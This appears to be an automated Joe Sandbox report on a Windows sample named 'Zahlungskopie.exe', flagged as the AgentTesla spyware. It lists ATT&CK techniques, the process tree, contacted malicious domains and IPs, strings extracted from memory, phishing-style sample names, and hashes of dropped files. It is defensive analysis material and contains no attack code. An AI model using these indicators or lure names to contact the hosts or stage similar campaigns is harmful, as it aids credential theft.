              Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Access Token Manipulation 1 | Obfuscated Files or Information 2 | Security Account Manager | System Information Discovery 114 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | Service Execution 2 | Logon Script (Mac) | Windows Service 1 | Software Packing 1 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Process Injection 12 | Timestomp 1 | LSA Secrets | Security Software Discovery 121 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 14 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 14 | DCSync | Process Discovery 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 12 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
              Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

              Behavior Graph

              [Behavior graph image not preserved. Behavior Graph ID: 361303; Sample: Zahlungskopie.exe; Start date: 02/03/2021; Architecture: WINDOWS; Score: 80]
              Process tree: Zahlungskopie.exe started two powershell.exe processes (each with a conhost.exe child), AdvancedRun.exe (which started a second AdvancedRun.exe), and 3 other processes.
              Dropped files: C:\Users\user\...\Zahlungskopie.exe.log (ASCII), C:\Users\user\AppData\...\1mkqjldz.newcfg (XML), C:\Users\user\AppData\...\AdvancedRun.exe (PE32).
              Network: chelseafc.map.fastly.net (151.101.2.133, FASTLYUS, United States), 0k10dk21kkeok2e.online (104.21.59.148, CLOUDFLARENETUS, United States), and 8 other IPs or domains.

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              Zahlungskopie.exe | 30% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

              Dropped Files

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe | 3% | Metadefender |
              C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe | 0% | ReversingLabs |

              Unpacked PE Files

              Source | Detection | Scanner | Label
              18.2.Zahlungskopie.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

              Domains

              No Antivirus matches

              URLs


              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              0k10dk21kkeok2e.online | 104.21.59.148 | true | false | | unknown
              chelseafc.map.fastly.net | 151.101.2.133 | true | false | | unknown
              d2hhwit6pbhmvu.cloudfront.net | 99.86.159.29 | true | false | | high
              www.realmadrid.com | unknown | unknown | false | | high
              www.manutd.com | unknown | unknown | false | | high
              www.liverpoolfc.com | unknown | unknown | false | | high
              www.mancity.com | unknown | unknown | false | | high
              www.chelseafc.com | unknown | unknown | false | | high

                              Contacted URLs

                              Name | Malicious | Antivirus Detection | Reputation
                              http://0k10dk21kkeok2e.online/base/83650593F542427F159D29BCCFD755F9.html | false | Avira URL Cloud: safe | unknown

                              URLs from Memory and Binaries

                                                                                                high
                                                                                                https://www.snapchat.com/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipZahlungskopie.exe, 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/aa0024fde91a556201a3e18acZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/73/thumb_72810_partnerlogo_pZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://tribus-watches.com/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.realmadrid.com/base/qDRJjWQmMciVzZexKqxHvQNCUcCUOevUqtCcibaOeqaXQSxokmSbdsVNdhpUn.htmlZahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmp, Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.liverpoolfc.com/legal/privacy-policyZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112227_partnerlogo_Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://ocsp.sca1b.amazontrust.com06Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haZahlungskopie.exe, 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://go.micropowershell.exe, 0000000B.00000003.812678409.000000000562E000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.819057899.0000000004FFF000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://www.mancity.com/base/qDRJjWQmMciVzZexKqxHvQNCUcCUOevUqtCcibaOeqaXQSxokmSbdsVNdhpUn.htmlZahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmp, Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.liverpoolfc.com/legal/terms-and-conditionsZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.manutd.cget_UserSetCursorom/Zahlungskopie.exefalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                low
                                                                                                                http://0k10dk21kkeok2e.online/base/0A48866E716remove_ParentChangedB370203D6A936495BDF28.htmlZahlungskopie.exefalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.liverpoolfc.com/news/academyZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://www.liverpoolfc.com/history/hillsboroughZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.liverpoolfc.com/scripts/logout.phpZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sZahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://matchcentre.liverpoolfc.com?utm_medium=site-link-liverpoolfc.com&amp;utm_source=home-top-navZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.twitter.com/realmadridZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/AjaxLoader-298x179.gifZahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://reachsportshop.com/team/liverpool/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.liverpoolfc.com/news/axa-training-centreZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.axa.com/?utm_source=liverpoolfc&amp;utm_medium=logo-partnership&amp;utm_campaign=lfc1819Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/lfc-pl-logos-fullZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/misc/0002/14/thumb_113618_misc_general_234x23Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/caba13e5118c92cd18eab74b2Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.chelseafc.comZahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.realmadrid.set_DisallowApplicationBaseProbingcom/base/Zahlungskopie.exefalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        low
                                                                                                                                        https://www.liverpoolfc.comZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://crl.rootg2.amazontrust.com/rootg2.crl0Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.liverpoolfc.WaitForConnectionAsynccom/Zahlungskopie.exefalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108617_partnerlogo_Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/f9d2bf533c57965e0174bf510Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.tiktok.com/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://events.liverpoolfc.comZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.mancity.com4Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://o.ss2.us/0Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.liverpoolfc.com/accessible/accessibleZahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://0k10dk21kkeok2e.online/base/83650FSWAsyncResult593F542427F159D29BCCFD755F9.htmlZahlungskopie.exefalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://schema.org/OrganizationZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107008_partnerlogo_Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.mancity.comZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.manutd.com/en/Partners/Global/Visit-MaltaZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.nike.com/gb/Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.liverpoolfc.com/match/2020-21/u23s/fixtures-and-resultsZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.verbier.ch/en/index.htm?reset=1Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.liverpoolfc.com/legal/cookiesZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/scripts.min.jsZahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112272_partnerlogo_Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.manutd.com/en/Help/AccessibilityZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.tourism-mauritius.muZahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://ocsp.sectigo.com0Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
https://nesn.com/liverpool-fc/ | Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmp | false | high
https://www.youtube.com/manutd | Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmp | false | high
http://www.liverpoolfc.com/corporate/rss-feeds | Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp | false | high

                                                                                                                                                                                Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
151.101.2.133 | unknown | United States | 54113 | FASTLYUS | false
99.86.159.29 | unknown | United States | 16509 | AMAZON-02US | false
104.21.59.148 | unknown | United States | 13335 | CLOUDFLARENETUS | false
99.86.159.34 | unknown | United States | 16509 | AMAZON-02US | false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 361303
Start date: 02.03.2021
Start time: 20:08:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 1s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Zahlungskopie.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.troj.evad.winEXE@17/16@21/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 100% (good quality ratio 95.8%)
• Quality average: 83%
• Quality standard deviation: 25.9%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 77
• Number of non-executed functions: 173
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                                                                                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

Time | Type | Description
20:08:48 | API Interceptor | 287x Sleep call for process: Zahlungskopie.exe modified
20:09:49 | API Interceptor | 125x Sleep call for process: powershell.exe modified

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

Match | Associated Sample Name / URL | Detection | Context
151.101.2.133 | Purchase Order.exe | malicious | www.chelseafc.com/
151.101.2.133 | Reversing Purchase Orders.exe | malicious | www.chelseafc.com/
151.101.2.133 | Purchase Order 267282.exe | malicious | www.chelseafc.com/
151.101.2.133 | RFQ_397568464846568465467384638364834,pdf.exe | malicious | www.chelseafc.com/
151.101.2.133 | G.I gratings-pdf.exe | malicious | www.chelseafc.com/
151.101.2.133 | REQUEST FOR QUOTATION DOCUNMET.exe | malicious | www.chelseafc.com/
151.101.2.133 | NEW ORDERS 122020 2 x 40 HQ.exe | malicious | www.chelseafc.com/
151.101.2.133 | vzoWnmtGk0.exe | malicious | www.chelseafc.com/
151.101.2.133 | enquries.pdf.exe | malicious | www.chelseafc.com/base/dOVkcmMWSJnEtaXdENzqlBWragOdo.html
151.101.2.133 | _swft01032021.doc | malicious | www.chelseafc.com/
151.101.2.133 | SHIPMENT DOCUMENT.exe | malicious | www.chelseafc.com/
151.101.2.133 | ORDER01032021rfggfscan.exe | malicious | www.chelseafc.com/
151.101.2.133 | AkbankSubeMevduatEkstre.pdf.exe | malicious | www.chelseafc.com/
151.101.2.133 | http://resources.digital-cloud.medallia.ca | malicious | resources.digital-cloud.medallia.ca/
151.101.2.133 | http://lassertoolersa.tk | malicious | secure2.alphassl.com/cacert/gsalphasha2g2r1.crt
151.101.2.133 | https://tedia.com/laboratory/global-research-part1/feature-article-73/index.html | malicious | secure2.alphassl.com/cacert/gsalphasha2g2r1.crt
99.86.159.29 | Purchase Order.exe | malicious | www.liverpoolfc.com/
99.86.159.29 | enquries.pdf.exe | malicious | www.liverpoolfc.com/base/dOVkcmMWSJnEtaXdENzqlBWragOdo.html

                                                                                                                                                                                Domains

Match | Associated Sample Name / URL | Detection | Context
d2hhwit6pbhmvu.cloudfront.net | Purchase Order.exe | malicious | 99.86.159.29
d2hhwit6pbhmvu.cloudfront.net | Reversing Purchase Orders.exe | malicious | 13.225.74.67
d2hhwit6pbhmvu.cloudfront.net | Purchase Order 267282.exe | malicious | 13.225.74.106
d2hhwit6pbhmvu.cloudfront.net | G.I gratings-pdf.exe | malicious | 13.225.74.20
d2hhwit6pbhmvu.cloudfront.net | REQUEST FOR QUOTATION DOCUNMET.exe | malicious | 13.225.74.67
d2hhwit6pbhmvu.cloudfront.net | NEW ORDERS 122020 2 x 40 HQ.exe | malicious | 13.225.80.39
d2hhwit6pbhmvu.cloudfront.net | enquries.pdf.exe | malicious | 99.86.159.29
d2hhwit6pbhmvu.cloudfront.net | SHIPMENT DOCUMENT.exe | malicious | 99.86.159.34
d2hhwit6pbhmvu.cloudfront.net | ORDER01032021rfggfscan.exe | malicious | 13.225.78.71
d2hhwit6pbhmvu.cloudfront.net | AkbankSubeMevduatEkstre.pdf.exe | malicious | 13.225.78.73
0k10dk21kkeok2e.online | Purchase Order.exe | malicious | 104.21.59.148
0k10dk21kkeok2e.online | Reversing Purchase Orders.exe | malicious | 172.67.179.188
0k10dk21kkeok2e.online | Purchase Order 267282.exe | malicious | 172.67.179.188
0k10dk21kkeok2e.online | G.I gratings-pdf.exe | malicious | 172.67.179.188
0k10dk21kkeok2e.online | REQUEST FOR QUOTATION DOCUNMET.exe | malicious | 172.67.179.188
                                                                                                                                                                                NEW ORDERS 122020 2 x 40 HQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.179.188
                                                                                                                                                                                chelseafc.map.fastly.netPurchase Order.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                Reversing Purchase Orders.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                Purchase Order 267282.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                RFQ_397568464846568465467384638364834,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                G.I gratings-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                REQUEST FOR QUOTATION DOCUNMET.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                NEW ORDERS 122020 2 x 40 HQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                vzoWnmtGk0.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                enquries.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                _swft01032021.docGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                SHIPMENT DOCUMENT.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                ORDER01032021rfggfscan.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133
                                                                                                                                                                                AkbankSubeMevduatEkstre.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 151.101.2.133

ASN


JA3 Fingerprints


Dropped Files

Match: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe
Associated Sample Name / URL (Detection):
• Purchase Order.exe (malicious)
• Reversing Purchase Orders.exe (malicious)
• NEW ORDERS 122020 2 x 40 HQ.exe (malicious)
• ORDER01032021rfggfscan.exe (malicious)
• FedEx's AWB#5305323204643.exe (malicious)
• believehot23 cccc.exe (malicious)
• order confirmation 6026022001.exe (malicious)
• PROFORMA INVOICE.exe (malicious)
• CN-Invoice-XXXXX9808-19011143287989.exe (malicious)
• RFQ - REF 208056-pdf.exe (malicious)
• CN-Invoice-XXXXX9808-19011143287994.exe (malicious)
• PRODUCT SPECIFICATION.exe (malicious)
• DHL_document1102202068090891.exe (malicious)
• em6eElVbOm.exe (malicious)
• Purchase Order_Pdf.exe (malicious)
• Fireman.exe (malicious)
• NEW ORDER.exe (malicious)
• CN-Invoice-XXXXX9808-19011143287993.exe (malicious)
• payment confirmation 0029175112.exe (malicious)
• Vrxs6evJO7.exe (malicious)

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Users\user\Desktop\Zahlungskopie.exe
File Type: Microsoft Cabinet archive data, 59134 bytes, 1 file
Category: dropped
Size (bytes): 59134
Entropy (8bit): 7.995450161616763
Encrypted: true
SSDEEP: 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5: E92176B0889CC1BB97114BEB2F3C1728
SHA1: AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256: 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512: CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious: false
Reputation: high, very likely benign file

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Users\user\Desktop\Zahlungskopie.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.084754685484955
Encrypted: false
SSDEEP: 6:kK/NhbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:No3kPlE99SNxAhUeo+aKt
MD5: 2BAE866BBB66267974746C4FCA25B26C
SHA1: 89C88DB6EDF1EEAD3AF69135DF5274A5B418D4B8
SHA-256: 898883BF305DFD975BD849C28B21656993E8DF9E2C4F0554F2CEA291AFBA21A0
SHA-512: BE0FBC456ED30EEF38755F11A7364CCB19313245BF2E0D8B88E0EA2BD3AC4B3AB56601377D19C782AF51FCB09DADB4A6DC3147AE6A720F1DA002629DAAA7DF34
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\EyZTsSvYLRhPfexadI\Zahlungskopie.exe_Url_zqqzfjdjk0smwfdoeqe34myf304yymrv\8.417.419.740\1mkqjldz.newcfg
Process: C:\Users\user\Desktop\Zahlungskopie.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1985591
Entropy (8bit): 3.026240702227183
Encrypted: false
SSDEEP: 6144:H6bxmA9eM7UFCXxOzWc9I0R6+Z8YtitMw2sv7UUiwo:abxmA9rQsSB6+Z84i20TUX
MD5: DEC33882BBF485523E1D78F7E713168F
SHA1: CBAA8ED27C4914183FB52527BFCC0AC20727958F
SHA-256: D3A41452286EAAF4A96902FC82A744F1AD3123ED2BAE7DC2DA96990DDDAF7009
SHA-512: 08A14FA38CFFCF671EEB948F5BB794FE6C560BE5371BAB5045CEC31AAD035B07459A170E301FBCC0B7C3C5F83505509682EADB34B2770ACE6D524EA9382CDDE5
Malicious: true
Reputation: low

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zahlungskopie.exe.log
Process: C:\Users\user\Desktop\Zahlungskopie.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
